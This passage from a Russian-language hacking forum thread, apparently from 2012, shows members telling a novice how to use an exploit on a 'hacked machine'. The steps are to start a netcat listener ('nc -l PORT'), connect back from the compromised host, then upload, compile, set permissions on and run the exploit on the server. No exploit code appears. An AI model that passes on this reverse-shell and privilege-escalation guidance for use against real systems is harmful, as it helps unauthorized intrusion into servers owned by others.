    О эксплоит есть осталось разобраться как его загрузить и выполнить.Кто поможет с меня пиво.
     
  18. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    По почте пиво присылать будешь? На своей машине слушаешь порт через netcat: nc -l PORT.

    На взломанной тачке коннектишься к своей, используешь сплоит --> профит!
     
    #398 Zed0x, 7 Oct 2012
    Last edited: 7 Oct 2012
  19. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Zed0x прога на комп для конекта так и называеться netcat?И как в ней потом выполнить сплоит?Нужно скопировать его к себе на комп а потом в netcat указать к нему путь?
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Да, так и называется!

    Копируйте себе на комп, а потом конетитесь к шелу или с шела к себе, логично что сплоит должен быть залит на сам сервак, заливаите на сервак, компелируйте, выстовляите нужные прова, запускаите, профит.

    Вам было бы не плохо почитать статейки по неткату и рутанью серваком, знания нулевые, сначало читайте статьи а потом по непонятным моментам задовайте вопросы...
     
    _________________________